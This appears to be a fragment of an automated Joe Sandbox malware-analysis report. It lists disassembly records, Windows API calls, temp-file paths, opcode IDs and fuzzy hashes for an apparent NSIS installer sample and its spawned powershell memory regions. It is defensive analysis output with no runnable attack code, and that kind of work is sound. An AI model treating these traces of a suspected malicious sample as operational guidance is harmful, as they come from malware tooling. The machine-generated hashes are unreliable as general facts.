                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                            • String ID: verifying installer: %d%%
                                                                                            • API String ID: 1451636040-82062127
                                                                                            • Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                            • Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
                                                                                            • Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                            • Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58
                                                                                            APIs
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                            • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2667972263-0
                                                                                            • Opcode ID: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                                                                            • Instruction ID: 9b62f472eb3a95df078ad497759be9c31f6c15c11f60cf08f6005a6c9cb4e6e4
                                                                                            • Opcode Fuzzy Hash: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                                                                            • Instruction Fuzzy Hash: 9921BFB1C00128BBCF116FA5DE49D9E7E79EF09364F14423AF960762E0CB794C419B98
                                                                                            APIs
                                                                                            • GetDC.USER32(?), ref: 00401DBC
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                            • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                            • String ID:
                                                                                            • API String ID: 3808545654-0
                                                                                            • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                                            • Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
                                                                                            • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                                            • Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                            • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                            • String ID:
                                                                                            • API String ID: 1849352358-0
                                                                                            • Opcode ID: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
                                                                                            • Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
                                                                                            • Opcode Fuzzy Hash: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
                                                                                            • Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38
                                                                                            APIs
                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Timeout
                                                                                            • String ID: !
                                                                                            • API String ID: 1777923405-2657877971
                                                                                            • Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                                            • Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
                                                                                            • Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                                            • Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                                            • wsprintfW.USER32 ref: 00404B65
                                                                                            • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                            • String ID: %u.%u%s%s
                                                                                            • API String ID: 3540041739-3551169577
                                                                                            • Opcode ID: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                                                                            • Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
                                                                                            • Opcode Fuzzy Hash: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                                                                            • Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8
                                                                                            APIs
                                                                                            • WideCharToMultiByte.KERNEL32(?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00000400,?,?,00000021), ref: 004025E8
                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00000400,?,?,00000021), ref: 004025F3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWidelstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsu4899.tmp
                                                                                            • API String ID: 3109718747-4063874830
                                                                                            • Opcode ID: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
                                                                                            • Instruction ID: 4bb1670e371a3de23f361dcee459543bcfcf4636ee0f51b5b5a9e7d0ab821041
                                                                                            • Opcode Fuzzy Hash: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
                                                                                            • Instruction Fuzzy Hash: DB11CB72A05300BEDB046FB18E8999F7664AF54399F20843FF502F61D1D9FC89415B5E
                                                                                            APIs
                                                                                            • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405C25
                                                                                            • CharNextW.USER32(00000000), ref: 00405C2A
                                                                                            • CharNextW.USER32(00000000), ref: 00405C42
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\nsu4899.tmp, xrefs: 00405C18
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsu4899.tmp
                                                                                            • API String ID: 3213498283-4063874830
                                                                                            • Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                            • Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
                                                                                            • Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                            • Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 00405B72
                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 00405B7C
                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B8E
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 2659869361-3936084776
                                                                                            • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                            • Instruction ID: 803477e47080facc391f0cecd2807ccdb00b9d1fdb40608b9d44cb66137c19bb
                                                                                            • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                            • Instruction Fuzzy Hash: 3BD0A731501A30AAC111BB449D04DDF72ACDE45304342047FF101B31A2C7BC2D5287FD
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                            • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                            • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                            • String ID:
                                                                                            • API String ID: 2102729457-0
                                                                                            • Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                                            • Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
                                                                                            • Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                                            • Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC
                                                                                            APIs
                                                                                              • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                              • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405C25
                                                                                              • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                                              • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405CCD
                                                                                            • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420), ref: 00405CDD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsu4899.tmp
                                                                                            • API String ID: 3248276644-4063874830
                                                                                            • Opcode ID: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                                            • Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
                                                                                            • Opcode Fuzzy Hash: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                                            • Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 004052A2
                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004052F3
                                                                                              • Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                            • String ID:
                                                                                            • API String ID: 3748168415-3916222277
                                                                                            • Opcode ID: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                                            • Instruction ID: beea61cd65c8703650dc93cdae6e0720761c29505c5582e3341eda9a3c117467
                                                                                            • Opcode Fuzzy Hash: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                                            • Instruction Fuzzy Hash: BD01BC71200608AFEB208F11DD80AAB3B25EF85355F20807FFA01761D0C73A8C919F2E
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76233420,004038CA,004036E0,00000006,?,00000006,00000008,0000000A), ref: 0040390C
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00403913
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403904
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Free$GlobalLibrary
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 1100898210-3936084776
                                                                                            • Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                                            • Instruction ID: 827a6d7c30b52d61f5a2dbff04e35f254d4b7381da6d9dc608e34789494937b8
                                                                                            • Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                                            • Instruction Fuzzy Hash: 58E0CD334010205BC6115F04FE0475A77685F45B22F16003BFC807717147B41C538BC8
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\You7ynHizy.exe,C:\Users\user\Desktop\You7ynHizy.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBE
                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\You7ynHizy.exe,C:\Users\user\Desktop\You7ynHizy.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BCE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrlen
                                                                                            • String ID: C:\Users\user\Desktop
                                                                                            • API String ID: 2709904686-3125694417
                                                                                            • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                            • Instruction ID: d1e11866c06308db2688671cfe2e39cf8e5f3b64411c1caee3e249c785e2e979
                                                                                            • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                            • Instruction Fuzzy Hash: BDD05EB34109209AC3126B08DC00D9F77BCEF11301746486AF440A6161D7786C8186AD
                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
                                                                                            • CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D2B
                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                            • String ID:
                                                                                            • API String ID: 190613189-0
                                                                                            • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                            • Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
                                                                                            • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                            • Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0db0c99a38096878b8fc8246231f8bbea73dbc3f8de53da761d7638d65c46955
                                                                                            • Instruction ID: 1222bfc1d142470a624f0958f5847a45210c3a5fa8a8c667b778b710a8b958b6
                                                                                            • Opcode Fuzzy Hash: 0db0c99a38096878b8fc8246231f8bbea73dbc3f8de53da761d7638d65c46955
                                                                                            • Instruction Fuzzy Hash: FF0351B0A00219DFDB24DB64C854BDAB7B2BF85344F10C4A9D909AB785DB71ED82CF91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 973ff119df35df0dfd9dd55d2f0ee758dda4c285b75b80919571ff797057eec6
                                                                                            • Instruction ID: 136c40f7e2dde6a4a28b8af2ffbc26bdac43fc3137026a411a0eec3361591aa1
                                                                                            • Opcode Fuzzy Hash: 973ff119df35df0dfd9dd55d2f0ee758dda4c285b75b80919571ff797057eec6
                                                                                            • Instruction Fuzzy Hash: 38528E38B00215CFDB25DF65D8547ADBBB3BF84304F1080A9E80AA7355EB74A985CFA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511008080.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_97d000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d7d6b079ed2eedf405b17a860f96f890bae7eb897520560d36f8692e22ab07bc
                                                                                            • Instruction ID: fd0b5a08bdd3bc2bbb45b308bb1bae5205f45525988c201bd97a7b53902b0c3b
                                                                                            • Opcode Fuzzy Hash: d7d6b079ed2eedf405b17a860f96f890bae7eb897520560d36f8692e22ab07bc
                                                                                            • Instruction Fuzzy Hash: F621E0B6504200EFCF05DF20D9D0B26BB65FB88354F24C5ADE90D5A256C73AD856CB61
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2532559046.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bb738d3425c2b6c8f307d96eaadbcfeef7c2ac344af28a980fe55f427b1625f0
                                                                                            • API String ID:
                                                                                            • Opcode ID: 066ba0558ef980bce43a982741de56e6b47f103cf83d22f88f042fda0403431b
                                                                                            • Instruction ID: ca3fe7f271e06f94bfb01e3b05d5e82ba0c512443379b814e4651ae479206148
                                                                                            • Opcode Fuzzy Hash: 066ba0558ef980bce43a982741de56e6b47f103cf83d22f88f042fda0403431b
                                                                                            • Instruction Fuzzy Hash: 0B410CB1B083568FDF168B7894645A6FBB29FD3110B2880BBC505DB2D6DB39C847C752
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0d68752a2a0fa055235720579eda57b8936ec454ac129d05ec53aaa553d917de
                                                                                            • Instruction ID: 4d08bbed5ca9ae2def41c8be9d1a080f57ba564eeed12a0fbf25068b505d1666
                                                                                            • Opcode Fuzzy Hash: 0d68752a2a0fa055235720579eda57b8936ec454ac129d05ec53aaa553d917de
                                                                                            • Instruction Fuzzy Hash: 30413BF1704151CBDF259BB89411A9EBBA29FD3A54B1484BED5428B385DB72CC02C7A2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c0b1502c74faf99483244646febc17daa79d706a4a115f1bffc2bc0bd8a86447
                                                                                            • Instruction ID: cb9cfce9d5739b4cf452e84f8f392af4bb05dbccf42a77d169d59f781036b400
                                                                                            • Opcode Fuzzy Hash: c0b1502c74faf99483244646febc17daa79d706a4a115f1bffc2bc0bd8a86447
                                                                                            • Instruction Fuzzy Hash: 38415E35B002048FDB04DBB9C454BAEBBE7EFC9310F14C029D80AAB356DE759C419BA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2532559046.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6ca00891a060946305d5a6b27cf0b12bda4163738ff8bd8e8785c595befe75c2
                                                                                            • Instruction ID: 858e9054dff9df5a8dbc897013cf68d724ff5ddc47910b0c70410482be6446d5
                                                                                            • Opcode Fuzzy Hash: 6ca00891a060946305d5a6b27cf0b12bda4163738ff8bd8e8785c595befe75c2
                                                                                            • Instruction Fuzzy Hash: 2C41A630505785CFDB16CB7CC9949AABFB1FF46310729869AC491DB2A6C738AC43CB60
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: babdc7168f0629df6100d3a51de1fbc55604e20a817a754e5f8c49c02b260497
                                                                                            • Instruction ID: 8736821030c2a700be5bc5140e33b7c9be2379fddc429064c30314c43474108d
                                                                                            • Opcode Fuzzy Hash: babdc7168f0629df6100d3a51de1fbc55604e20a817a754e5f8c49c02b260497
                                                                                            • Instruction Fuzzy Hash: EA4160357002149FDB29DB78D458AAA7BF3EF89794F044469D807EB3A0DB34AD45CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2aaabf5ad36e6a35fcb8d392b1a21d9b80e20b8c47ca5487ecbdac899c7848e7
                                                                                            • Instruction ID: 35767b4e768e49e34c0d3717954adcacb0f8c009b66acbc4e528c88ddbeb040d
                                                                                            • Opcode Fuzzy Hash: 2aaabf5ad36e6a35fcb8d392b1a21d9b80e20b8c47ca5487ecbdac899c7848e7
                                                                                            • Instruction Fuzzy Hash: EB51E834A00249CFDB05DFA8D584ADE7BB2BF88310F149158D805AB3A6DB74ED85CFA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
